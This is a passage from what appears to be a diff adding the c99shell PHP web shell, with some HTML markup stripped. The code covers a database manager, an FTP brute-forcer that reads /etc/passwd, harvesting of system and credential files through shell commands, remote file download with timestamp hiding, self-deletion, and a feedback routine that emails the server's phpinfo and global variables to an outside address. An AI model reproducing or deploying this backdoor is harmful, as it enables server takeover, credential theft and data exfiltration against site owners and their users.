    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
